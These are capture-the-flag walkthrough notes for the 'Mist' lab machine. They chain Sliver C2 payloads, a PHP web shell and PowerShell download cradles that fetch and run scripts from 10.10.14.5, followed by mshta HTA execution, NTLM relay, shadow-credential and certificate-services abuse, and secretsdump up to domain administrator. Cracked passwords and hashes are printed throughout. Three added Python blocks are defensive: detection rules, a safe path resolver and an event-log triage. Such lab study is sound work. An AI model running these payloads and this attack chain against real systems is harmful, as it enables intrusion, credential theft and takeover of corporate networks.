Sliver

https -L 10.10.14.5 -l 443
profiles new -b https://10.10.14.5:443 --format shellcode --arch amd64 mist
stage-listener --url https://10.10.14.5:8448 --profile mist --prepend-size
msfvenom -p windows/x64/custom/reverse_winhttps LHOST=10.10.14.5 LPORT=8448 LURI=/hello.woff -f csharp -o payload
cp ~/sliver_files/new.ps1 .
cat payload
code new.ps1
cp sliver64.xml .

Change the ip and the file name

base64 -w 0 sliver64.xml > sliver_base64.txt


Pasted this into the Sliver HTA file and created a shortcut named Notepad.lnk, since those were the applications in the folder

C:\Windows\System32\mshta.exe http://10.10.14.5/sliver64.hta

I then uploaded the Notepad.lnk in the same folder

Got shell

Shell as Brandon.Keywarp

upload SharpHound.exe
shell
./SharpHound.exe -c All
download 20240717024504_BloodHound.zip

Getting Shells

(New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/new.ps1') | IEX
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.5/large1.ps1'' -UseBasicParsing | iex"';
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.5:80/new.ps1%27)%22
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.5:80/new.ps1')"
nxc smb mucdc.heron.vl -u _admin --use-kcache -X "(New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/new.ps1') | IEX"
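The cradles above (mshta pulling a remote .hta, PowerShell DownloadString/iwr piped into IEX, xp_cmdshell spawning PowerShell) are what a blue team should be alerting on. Added detection example, not part of the original notes: it runs three rules over constructed process-creation records shaped like parsed Sysmon Event ID 1 / Security 4688 fields.

```python
import re

# Constructed sample records (parent image, child image, command line). These are
# demo data, not log lines captured from the box.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://10.10.14.5/sliver64.hta"},
    {"parent": "httpd.exe", "image": "cmd.exe",
     "cmdline": "cmd /c powershell \"IEX (New-Object System.Net.WebClient)"
                ".DownloadString('http://10.10.14.5:80/new.ps1')\""},
    {"parent": "sqlservr.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -Command "
                "\"iwr -Uri 'http://10.10.14.5/large1.ps1' -UseBasicParsing | iex\""},
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": r"notepad.exe C:\Users\Public\notes.txt"},
    {"parent": "services.exe", "image": "mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
]

# Command-line rules: mshta fetching an HTA over HTTP(S), and the two common
# download-cradle shapes (IEX(...DownloadString...) and "... | iex").
CMDLINE_RULES = [
    ("mshta_remote_hta", re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I)),
    ("powershell_download_cradle", re.compile(
        r"(?:iex|invoke-expression)\s*\(.*?(?:downloadstring|downloadfile)"
        r"|(?:downloadstring|iwr|invoke-webrequest|curl)\b.*?\|\s*(?:iex|invoke-expression)\b",
        re.I)),
]

# A web server or SQL server process spawning a shell is the xp_cmdshell /
# webshell pattern regardless of what the command line contains.
SERVER_PARENTS = {"httpd.exe", "w3wp.exe", "php-cgi.exe", "sqlservr.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def analyze(events):
    """Return {event_index: [rule names]} for every event that trips a rule."""
    hits = {}
    for idx, ev in enumerate(events):
        names = [name for name, rx in CMDLINE_RULES if rx.search(ev["cmdline"])]
        if ev["parent"].lower() in SERVER_PARENTS and ev["image"].lower() in SHELL_IMAGES:
            names.append("server_process_spawned_shell")
        if names:
            hits[idx] = names
    return hits


if __name__ == "__main__":
    for idx, names in analyze(SAMPLE_EVENTS).items():
        print(idx, names, SAMPLE_EVENTS[idx]["cmdline"][:60])
```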

Enumeration

We start with a normal nmap scan.

sudo nmap -sC -sV -oA mist 10.10.11.17 -T4
Nmap results (mist.nmap):

Port  Service  Version
80    http     Apache httpd 2.4.52

The site runs Pluck CMS, which is very old.

We search for known exploits for Pluck 4.7.18 with searchsploit.

searchsploit pluck

Found RCE for this version

python rce file

We now mirror the exploit to see what it is doing.

searchsploit -m php/webapps/51592.py

The exploit uploads a malicious zip file containing a PHP reverse shell. But the exploit is authenticated and we don’t have a password.

Now we try to perform directory enumeration.

Feroxbuster found too many directories, so I searched Google for the important Pluck directories instead and came across another exploit.

https://www.exploit-db.com/exploits/36129

It was not directly relevant, but it gave us a directory.

After trying two or three possible ways we found

Again looking further we found

https://security.szurek.pl/en/pluck-cms-472-path-traversal/
http://pluck-url/data/modules/albums/albums_getimage.php?image=thumb/../../../../settings/langpref.php

We combine all this

Request

Response

<?php
$ww = 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e';
?>
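The traversal works because albums_getimage.php joins the image parameter onto its thumbnail directory without checking where the normalised path ends up. Added example, not Pluck's code: a Python model of the check the handler should make, with IMAGE_ROOT as an assumed document layout.

```python
import posixpath
from urllib.parse import unquote

# Assumed location of the album images for the demo; not Pluck's real layout.
IMAGE_ROOT = "/var/www/html/data/albums"
ALLOWED_EXT = (".jpg", ".jpeg", ".png", ".gif")


def resolve_image(param):
    """Return the absolute path to serve, or None if `param` must be rejected.

    Decode once, refuse NUL bytes and absolute paths, normalise away any '..'
    segments, and require the result to still sit inside IMAGE_ROOT with an
    image extension. Anything else (like the langpref.php payload) is refused.
    """
    decoded = unquote(param)
    if "\x00" in decoded or decoded.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(IMAGE_ROOT, decoded))
    # normpath collapses '..'; a path that climbed above the root no longer
    # starts with IMAGE_ROOT and is rejected.
    if candidate != IMAGE_ROOT and not candidate.startswith(IMAGE_ROOT + "/"):
        return None
    if not candidate.lower().endswith(ALLOWED_EXT):
        return None
    return candidate


if __name__ == "__main__":
    for p in ("thumb/holiday.jpg", "thumb/../../../../settings/langpref.php"):
        print(p, "->", resolve_image(p))
```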

ChatGPT told us:

  • The given hash is 128 characters long, which is typical for SHA-512.

hashcat -m 1700 hash.txt ../../vulnlab/heron/rockyou.txt

Hash Cracked

The password we found is

lexypoo97

Let’s try to login with this password.

Successful login

We were successfully able to login to the pluck cms.

Now that we are an authenticated user, we try the RCE exploit we found earlier.

  • We need to modify the script to add the password.

We first need a php shell

vim shell.php

PHP shell (Windows)

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
}
?>

http://10.10.11.17/data/modules/shell3/shell3.php?cmd=powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.5:80/new.ps1%27)%22

Got the shell on sliver

execute-assembly /home/jay/htb/mist/Certify.exe request /ca:DC01.mist.htb\\mist-DC01-CA /template:User

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

With empty password

After setting up ligolo on MS01 we run the following command.

Scanning the network

certipy auth -pfx cert.pfx -u brandon.keywarp -domain mist.htb -dc-ip 192.168.100.100 -debug

hash of brandon user

Got hash for 'brandon.keywarp@mist.htb': aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1d07082740626cc9

WEBDAV try

I added DC01 to /etc/resolv.conf

I tried this but did not have enough access rights.

python3 dnstool.py -u 'mist.htb\brandon.keywarp' DC01.mist.htb --tcp -p aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1d07082740626cc9 -a add -t A -r hacksafely.mist.htb -d 10.10.14.5

ntlmrelayx.py -t ldap://DC01.mist.htb --http-port 8080 --delegate-access --no-dump --no-acl --no-da

Webdav

We check on MS01 whether the WebClient service is running, but it is not.

net use h: http://10.10.14.5/bulb

sudo responder -I tun0 -A

Get-Service WebClient
./GetWebDAVStatus.exe 127.0.0.1

Now it's running

Unmanaged Powershell Sliver

https://github.com/mmnoureldin/UnmanagedPowerShell/tree/master

We downloaded and compiled UnmanagedPowerShell.exe

then used donut to have it as shellcode file

./donut -i /home/jay/htb/mist/UnmanagedPowerShell.exe -o /home/jay/htb/mist/powershell.bin

execute-shellcode -i powershell.bin

powershell interactive

New-ADIDNSNode -Tombstone -Verbose -Node hacksafely.mist.htb -Data 10.10.14.5

rportfwd add -b 8888 -r 10.10.14.5:8888

WEBDAV to LDAP Relaying

On attacker machine

sudo responder -I tun0 -A

starting rport forward

On machine running WEBDAV as svc_web

Get-Service WebClient
net use * http://10.10.14.5/webdav

Sliver shell of that machine using brandon shell

rportfwd add -b 8888 -r 10.10.14.5:8888

On attacker Machine

It’s in htb/mist/impacket

source .venv/bin/activate
./examples/ntlmrelayx.py -t ldaps://DC01.mist.htb --http-port 8888 --shadow-credentials --shadow-target 'MS01$' -i

It needs to be the lsarpc pipe

ntlmrelayx.py -t ldaps://DC01.mist.htb --http-port 8888 --shadow-credentials --shadow-target 'MS01$' -i
coercer coerce -u brandon.keywarp --hashes :db03d6a77a2205bc1d07082740626cc9 -d mist.htb -l "MS01@8888/e" -t 192.168.100.101 --auth-type http

git clone https://github.com/fortra/impacket/ && cd impacket

git fetch origin pull/1402/head:mist && git checkout mist

python -m venv .venv && source .venv/bin/activate

pip install . && pip install -r requirements.txt && pip install pyOpenSSL==24.0.0
nc 127.0.0.1 11001
clear_shadow_creds ms01$
set_shadow_creds ms01$
certipy cert -pfx zmiYN0ah.pfx -password xBL0jnagv6CuySU2PM2Q -export -out ms01.pfx
certipy auth -pfx ms01.pfx -dc-ip 192.168.100.100  -username MS01 -domain mist.htb

Got ms01 hash

 Got hash for 'ms01@mist.htb': aad3b435b51404eeaad3b435b51404ee:057697ab6d6b85dc0f7eb5182b067c75

aad3b435b51404eeaad3b435b51404ee:233291a120842834aca3e76bcd457a70:
ms01.ccache
aad3b435b51404eeaad3b435b51404ee:057697ab6d6b85dc0f7eb5182b067c75
getST.py -self -impersonate "Administrator" -altservice "cifs/ms01.mist.htb" -k -no-pass -dc-ip 192.168.100.100 mist.htb/'ms01$'

nxc smb MS01.mist.htb --use-kcache --lsa

svc_web:MostSavagePasswordEver123
secretsdump.py -k MS01.mist.htb
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c4029c3c7681dd97b:::

nxc smb MS01.mist.htb --use-kcache -X "mshta.exe http://10.10.14.5/sliver64.hta"

45bd22e2fdec7c3726790903a156f732
  • We found an image file in the Pictures folder.
  • It revealed 14 characters of the password: UA7cpa[#1!_*ZX.
  • We needed one more character.

We have the partial password UA7cpa[#1!_*ZX and are not sure about the last character, so we append ?a, the hashcat mask token for all printable ASCII characters, giving the mask UA7cpa[#1!_*ZX?a.

We save this mask as pass.txt

hashcat -a 3 -m 13400 try2.txt  pass.txt
UA7cpa[#1!_*ZX@

So now we have the master password for the KeePass database.

ImTiredOfThisJob:(

Password spray with all users.

nxc smb DC01.mist.htb -u users.txt -p passwords.txt --continue-on-success

Now let’s see what op_sharon.mullard can do in BloodHound.

  • Member of the Operatives group, which is part of Remote Management Users

User op_sharon.mullard can read the gMSA password.

Read gMSA password

nxc ldap DC01.mist.htb -u op_sharon.mullard -p 'ImTiredOfThisJob:(' --gmsa

svc_ca$
132af7136478f26a1b227d08a508a526

User svc_ca$ is a member of the Managed Service Accounts and Certificate Services groups.

svc_ca$ has AddKeyCredentialLink over svc_cabackup, so we can perform a shadow credentials attack here.

Shadow Credential Attack

pywhisker.py -d "mist.htb" -u "svc_ca$" -H 132af7136478f26a1b227d08a508a526 --target "svc_cabackup" --action "add" -e pfx

certipy cert -pfx LxLvZ6SN.pfx -password fc3Am4EXoCY2hKxV3ZBe -export -out svc_cabackup.pfx
certipy auth -pfx svc_cabackup.pfx -dc-ip 192.168.100.100  -username MS01 -domain mist.htb

svc hash

Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64
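Both shadow-credentials steps in these notes (the relay writing MS01$'s own msDS-KeyCredentialLink, and svc_ca$ writing svc_cabackup's) leave a Security Event ID 5136 on the DC once auditing of directory service changes is on. Added detection example, not from the original notes: it triages constructed 5136 records, treating writes by a different principal as the highest-signal case and self-writes by machine accounts as review items; the ALLOWED_WRITERS name is a placeholder.

```python
import re

# Constructed 5136 (Directory Service Changes) records reduced to the fields a
# SIEM would already have parsed. Demo data, not events from the box.
SAMPLE_5136 = [
    {"subject": "MIST\\MS01$", "object_dn": "CN=MS01,CN=Computers,DC=mist,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "operation": "Value Added"},
    {"subject": "MIST\\svc_ca$", "object_dn": "CN=svc_cabackup,CN=Users,DC=mist,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "operation": "Value Added"},
    {"subject": "MIST\\sync_svc", "object_dn": "CN=WS07,CN=Computers,DC=mist,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "operation": "Value Added"},
    {"subject": "MIST\\helpdesk1", "object_dn": "CN=jdoe,CN=Users,DC=mist,DC=htb",
     "attribute": "description", "operation": "Value Added"},
]

# Principals expected to populate key credentials legitimately (for example a
# directory sync account). Placeholder value; set per environment.
ALLOWED_WRITERS = {"mist\\sync_svc"}

_CN = re.compile(r"^CN=([^,]+)", re.I)


def classify(ev):
    """Return (subject, target, kind) for a KeyCredentialLink write, else None."""
    if ev["attribute"].lower() != "msds-keycredentiallink":
        return None
    subject = ev["subject"].lower()
    if subject in ALLOWED_WRITERS:
        return None
    # Compare the writer's sAMAccountName (minus the machine '$') with the
    # target's CN so a computer updating its own object is recognised as such.
    who = subject.split("\\", 1)[-1].rstrip("$")
    target = _CN.match(ev["object_dn"]).group(1).lower().rstrip("$")
    kind = "self_write" if who == target else "cross_account_write"
    return (ev["subject"], target, kind)


def triage(events):
    """Findings for every non-allowlisted write to msDS-KeyCredentialLink."""
    return [f for f in map(classify, events) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_5136):
        print(finding)
```

Cross-account writes should page someone; self-writes by computer accounts need an allowlist tuned to whatever (if anything) legitimately registers device keys in the environment.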

Now let’s see what svc_cabackup can do.

ADCS attack

certipy find -username 'svc_cabackup'@mist.htb -hashes c9872f1bc10bdd522c12fc2ac9041b64 -target DC01.mist.htb -dc-ip 192.168.100.100  -debug -ldap-channel-binding -old-bloodhound

certipy req  -username 'svc_cabackup' -hashes c9872f1bc10bdd522c12fc2ac9041b64 -ca 'mist-DC01-CA' -template 'ManagerAuthentication' -upn 'svc_cabackup@mist.htb' -dc-ip 192.168.100.100 -key-size 4096 -debug
certipy auth -pfx svc_cabackup.pfx -dc-ip 192.168.100.100  -username svc_cabackup -domain mist.htb
export KRB5CCNAME=svc_cabackup.ccache

certipy req -k -no-pass -username 'svc_cabackup' -hashes c9872f1bc10bdd522c12fc2ac9041b64 -ca 'mist-DC01-CA' -template 'BackupSvcAuthentication' -upn 'svc_cabackup@mist.htb' -key-size 4096 -target DC01.mist.htb -debug

certipy auth -pfx svc_cabackup.pfx -dc-ip 192.168.100.100  -username svc_cabackup -domain mist.htb
smbserver.py share . -smb2support
reg.py -k -no-pass 'mist.htb/svc_cabackup'@Dc01.mist.htb backup -o '\\10.10.14.5\share'
secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save LOCAL

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260
getST.py -self -impersonate "Administrator" -altservice "cifs/DC01.mist.htb" -k -no-pass -dc-ip 192.168.100.100 mist.htb/'DC01$' -hashes e768c4cf883a87ba9e96278990292260
nxc smb DC01.mist.htb --use-kcache -X "mshta.exe http://10.10.14.5/sliver64.hta"

d9f20fd90a7c8670b02bef3153415e82